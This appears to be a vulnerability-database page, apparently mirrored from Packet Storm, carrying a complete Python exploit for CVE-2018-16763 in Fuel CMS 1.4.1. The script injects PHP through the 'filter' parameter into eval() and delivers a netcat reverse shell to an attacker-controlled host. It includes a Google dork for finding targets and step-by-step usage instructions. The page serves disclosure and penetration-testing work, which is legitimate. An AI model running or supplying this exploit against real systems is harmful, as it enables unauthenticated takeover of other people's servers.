Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

๐Ÿ“„ Fuel CMS 1.4.1 Remote Command Execution

๐Ÿ—“๏ธย 06 Apr 2026ย 00:00:00Reported byย Suraj GuptaTypeย 
packetstorm
ย packetstorm๐Ÿ”—ย packetstorm.news๐Ÿ‘ย 65ย Views

Fuel CMS 1.4.1 enables code execution via filter parameter, allowing execution and shell access.

Related
Code
ReporterTitlePublishedViews
Family
0day.today		fuelCMS 1.4.1 - Remote Code Execution Exploit
20 Jul 201900:00
โ€“zdt
0day.today		Fuel CMS 1.4.1 - Remote Code Execution Exploit (3)
3 Nov 202100:00
โ€“zdt
GithubExploit		Exploit for Injection in Thedaylightstudio Fuel_Cms
10 Oct 202020:23
โ€“githubexploit
GithubExploit		Exploit for Injection in Thedaylightstudio Fuel_Cms
31 May 202215:31
โ€“githubexploit
GithubExploit		Exploit for Injection in Thedaylightstudio Fuel_Cms
10 Oct 202020:23
โ€“githubexploit
GithubExploit		Exploit for Injection in Thedaylightstudio Fuel_Cms
3 Nov 202104:38
โ€“githubexploit
GithubExploit		Exploit for Injection in Thedaylightstudio Fuel_Cms
9 Apr 202622:37
โ€“githubexploit
ATTACKERKB		CVE-2018-16763
9 Sep 201800:00
โ€“attackerkb
Circl		CVE-2018-16763
13 Jul 202213:02
โ€“circl
Check Point Advisories		FUEL CMS Remote Code Execution (CVE-2018-16763)
31 May 202000:00
โ€“checkpoint_advisories
Rows per page
#!/usr/bin/python3
    # Exploit Title: Fuel CMS 1.4.1 - Remote Code Execution (RCE) via filter parameter
    # Google Dork: intitle:"Welcome to Fuel CMS" inurl:/fuel/
    # Date: 2025-04-05
    # Exploit Author: Suraj Gupta (0xmrsecurity)
    # Author GitHub: https://github.com/0xmrsecurity
    # Vendor Homepage: https://www.getfuelcms.com/
    # Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
    # Version: 1.4.1
    # Tested on: Kali Linux 2024.1, Ubuntu 20.04
    # CVE: CVE-2018-16763
    # References:
    #   https://nvd.nist.gov/vuln/detail/CVE-2018-16763
    #   https://github.com/0xmrsecurity/Public_Poc/tree/main/CVE-2018-16763
    #
    # Description:
    #   Fuel CMS version 1.4.1 is vulnerable to Remote Code Execution (RCE) via
    #   the 'filter' parameter in /fuel/pages/select/. The parameter is passed
    #   unsanitized to PHP's eval() function, allowing an unauthenticated attacker
    #   to inject arbitrary PHP code and achieve OS-level command execution.
    #   Exploitation delivers a reverse shell to an attacker-controlled listener.
    #
    # Vulnerable Endpoint:
    #   GET /fuel/pages/select/?filter=[payload]
    #
    # Payload Technique:
    #   '+pi(print($a='system'))+$a('OS_COMMAND')+'
    #   The filter value is URL-encoded and injected into an eval() context.
    #
    # Impact:
    #   Unauthenticated Remote Code Execution โ€” complete server compromise.
    #   CVSS v3 Base Score: 9.8 (Critical)
    #
    # Usage:
    #   Step 1: Start a netcat listener on your attacker machine:
    #           nc -lvnp <PORT>
    #
    #   Step 2: Run the exploit:
    #           python3 CVE-2018-16763.py --ip <TARGET_IP> --rhost <YOUR_IP> --rport <YOUR_PORT>
    #
    #   Example:
    #           python3 CVE-2018-16763.py --ip 192.168.1.10 --rhost 192.168.1.5 --rport 4444
    #
    # Disclaimer:
    #   This exploit is for authorized penetration testing and educational purposes only.
    #   Use only on systems you own or have explicit written permission to test.
    #   The author is not responsible for any misuse or damage caused by this tool.
    
    import requests
    import urllib.parse
    import argparse
    import sys
    
    BANNER = """
      _____ _   _ ______ _        _____ __  __  _____   ____   _____ ______
     |  ___| | | || ____| |      / ____|  \/  |/ ____| |  _ \ / ____|  ____|
     | |_  | | | || |__  | |    | |    | \  / | (___   | |_) | |    | |__
     |  _| | | | ||  __| | |    | |    | |\/| |\___ \  |  _ <| |    |  __|
     | |   | |_| || |____| |____| |____| |  | |____) | | |_) | |____| |____
     |_|    \___/ |______|______|\_____|_|  |_|_____/  |____/ \_____|______|
    
     CVE-2018-16763 | Fuel CMS 1.4.1 - Unauthenticated RCE
     Author: Suraj Gupta | github.com/0xmrsecurity
    """
    
    def build_payload(rhost, rport):
        shell = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {rhost} {rport} >/tmp/f"
        encoded = urllib.parse.quote(shell)
        return encoded
    
    def exploit(target_ip, rhost, rport):
        print(BANNER)
        print(f"[*] Target      : http://{target_ip}")
        print(f"[*] Callback    : {rhost}:{rport}")
        print(f"[*] CVE         : CVE-2018-16763")
        print(f"[*] Affected    : Fuel CMS v1.4.1")
        print("-" * 55)
    
        payload = build_payload(rhost, rport)
    
        url = (
            f"http://{target_ip}/fuel/pages/select/"
            f"?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29"
            f"%2b%24%61%28%27{payload}%27%29%2b%27"
        )
    
        print(f"[+] Sending exploit payload to target...")
        print(f"[!] Start your listener now: nc -lvnp {rport}")
        print("-" * 55)
    
        try:
            r = requests.get(url, timeout=8)
            print(f"[+] Request sent โ€” HTTP {r.status_code}")
            if r.status_code == 200:
                print(f"[+] Payload delivered successfully.")
                print(f"[+] Check your listener on {rhost}:{rport} for reverse shell.")
            else:
                print(f"[-] Unexpected response code: {r.status_code}")
                print(f"[*] Target may be patched or unreachable.")
        except requests.exceptions.ConnectionError:
            print("[-] Connection failed โ€” target may be down or IP is incorrect.")
            sys.exit(1)
        except requests.exceptions.Timeout:
            print("[+] Request timed out โ€” this may indicate the shell connected!")
            print(f"[+] Check your listener on {rhost}:{rport}")
        except Exception as e:
            print(f"[-] Unexpected error: {e}")
            sys.exit(1)
    
    def main():
        parser = argparse.ArgumentParser(
            prog='CVE-2018-16763',
            description='Fuel CMS 1.4.1 โ€” Unauthenticated Remote Code Execution',
            epilog='Example: python3 CVE-2018-16763.py --ip 192.168.1.10 --rhost 192.168.1.5 --rport 4444'
        )
        parser.add_argument('--ip',    required=True, help='Target IP running Fuel CMS 1.4.1')
        parser.add_argument('--rhost', required=True, help='Your attacker/listener IP')
        parser.add_argument('--rport', required=True, help='Your attacker/listener port')
        args = parser.parse_args()
        exploit(args.ip, args.rhost, args.rport)
    
    if __name__ == '__main__':
        main()

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Apr 2026 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
CVSS 3.19.8
EPSS0.9391
fuel cmsremote code executionfilter parametervulnerability 2018 16763shell access
65